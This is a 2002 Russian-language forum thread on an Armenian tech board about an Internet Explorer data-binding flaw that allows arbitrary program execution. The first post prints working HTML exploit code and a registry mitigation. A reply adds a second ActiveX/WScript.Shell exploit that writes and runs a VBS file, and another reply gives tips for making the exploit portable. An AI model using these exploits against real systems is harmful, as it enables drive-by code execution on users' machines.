Armenian Knowledge Base  

Go Back   Armenian Knowledge Base > Technical sections > Software > Software Security
Register

Reply
 
LinkBack Thread Tools
Old 08.03.2002, 02:45   #1
Moderator
 
acid's Avatar
 
Join Date: 09 2001
Location: South Korea, Gumi
Posts: 7,699
Downloads: 102
Uploads: 34
Blog Entries: 16
Reputation: 561 | 6
Post Обнаружена серьёзная уязвимость в браузере IE

Израильские специалисты по компьютерной безопасности обнаружили весьма серьезную уязвимость в браузере IE. С её помощью на удаленной машине можно запустить любую программу, причем без использования скриптов и ActiveX.
Задействовать её можно с помощью следующего HTML-кода:
<blockquote><font size="1" face="MS Sans Serif, Verdana, Helvetica, sans-serif">code:</font><hr><pre>
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span><xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/winmine.exe"></object>
]]>
</exploit>
</security>
</xml>
</pre><hr></blockquote>

Данный код можно скопировать в блокнот и сохранить в файл с расширением .html. Если этот файл будет открыт в IE, автоматически запустится игра САПЁР но запустить можно любую программу и команду что делает эту уязвимость просто ужасной. Если внести в код маленькие изменения и внедрить переменную в пути исполняемой программы а не использовать абсолютные пути [c:/windows/system32/winmine.exe] на исполнение команд, то запуск программ обеспечен на любых компьютерах с операционными системами Windows. Уязвимость присутствует во всех версиях IE, так как используется функция "data binding", введенная еще в IE4.

Посмотреть на действие этого кода можно http://acid.land.am/koshmar.html.

От редакции: предполагается что у вас виндавоз находится в каталоге c:\windows

Просто без вашего разрешения запустится игра "САПЁР"

AVP ругается на этот код и говорит что есть подозрение на Exploit.CodeBaseExec но в данном случае это не вирус! NAV и другие антивирусы вообще не реагируют на этот код

Для запрета исполнения данного кода необходимо внести маленькие изменения в системный регистр, находим следующую ветку в регистре:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
и меняем значение для "1004" с dword:00000000 на dword:00000003
Для того чтобы внесённые изменения вступили в силу перезагрузите компьютер. И все.
На всякий случай не открывайте подобные демонстрационные странички в Интернете или в сомнительных местах и не выключайте AVP Monitor не известно что могут разместить на подобных страницах не порядочные люди.... Самое страшное это то что данный код можно пересылать по электронной почте в HTML коде

::::::::::: По материалам сайта http://www.compulenta.ru
Reply With Quote
Old 08.03.2002, 14:53   #2
Студент
 
Join Date: 01 2002
Location: Zimbabwe
Posts: 268
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

A u menya nichego ne proizhoslo <img src="sad-2.gif" border="0"> ..Potomu shto u menya XP na E: a na c: Me.Poetomu iz XP u menya nichego ne otkrilos <img src="biggrin2.gif" border="0"> No kak toko ya pomenyal c:/ na E:/ to srazu otkrilos..A vabshe cool thing :!!!
__________________
Things will never be the same again....
Reply With Quote
Old 08.03.2002, 17:27   #3
Консервативн
 
VX's Avatar
 
Join Date: 01 2002
Location: Кавказская Албания
Posts: 889
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

Xocu privesti eshe odin code dly ie, updati na etot bug mojno skachat' s windowsupdate

<blockquote><font size="1" face="MS Sans Serif, Verdana, Helvetica, sans-serif">code:</font><hr><pre>
<applet code="com.ms.activeX.ActiveXComponent" align="baseline" width="0" height="128"
highlight="0">
</applet>
<script language="JAVASCRIPT">
<!-- hide for safe browsers
InterfaceObject=document.applets[0];
setTimeout("Upload()",1000);
function Upload() {
fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}";
InterfaceObject.setCLSID(fsoClassID);
fso = InterfaceObject.createInstance();
// windir = fso.getspecialfolder(0);
filename = "\\vbstest.vbs";
file = fso.opentextfile(filename, "2", "TRUE");
file.writeline(filecontent1)
file.close();
Run();
}

function Run() {

WshShellClassID="{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}";
InterfaceObject.setCLSID(WshShellClassID);
wshShell = InterfaceObject.createInstance();
wshShell.run(filename,"6","TRUE"); }
-->
</script>
<script language="vbscript">
a=chr(34)
filecontent1="msgbox "&a&"You are vulnerable to Internet Explorer exploits!"&a&",16,"&a&"WARNING"&a&""
</script>

</pre><hr></blockquote>
__________________
Праздник к нам приходит...

|^^^^^^^^^'''^\| ||\__
| ВОДКА-ВОДКА | ||','''|'''''''\_____,_
| _..... _ | ||_ _|'__|_____||.........| |
'(@)'(@)'(@)''''''''''''''''''''''*|(@)""""|(@)*
Reply With Quote
Old 10.03.2002, 15:52   #4
Младенец
 
Join Date: 03 2002
Location: Yerevan
Posts: 28
Downloads: 0
Uploads: 0
Reputation: 0 | 0
Post

nax da shat hin problem e ev dra patch@ arden vaxuc ka wundowsupdate-um,

inch verabervum e windows XP-i E: partitioni vra gtnvelun, apa miayn lammernern en grum "c:\windows ..." kareli e ogragorcel parzapes %windir% kam %systemdir% popoxakanner@ u windows@ inq@ kgtni inch vor iren petq e
Reply With Quote
Sponsored Links
Reply

Thread Tools


На правах рекламы:
реклама

All times are GMT. The time now is 21:36.


Powered by vBulletin® Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.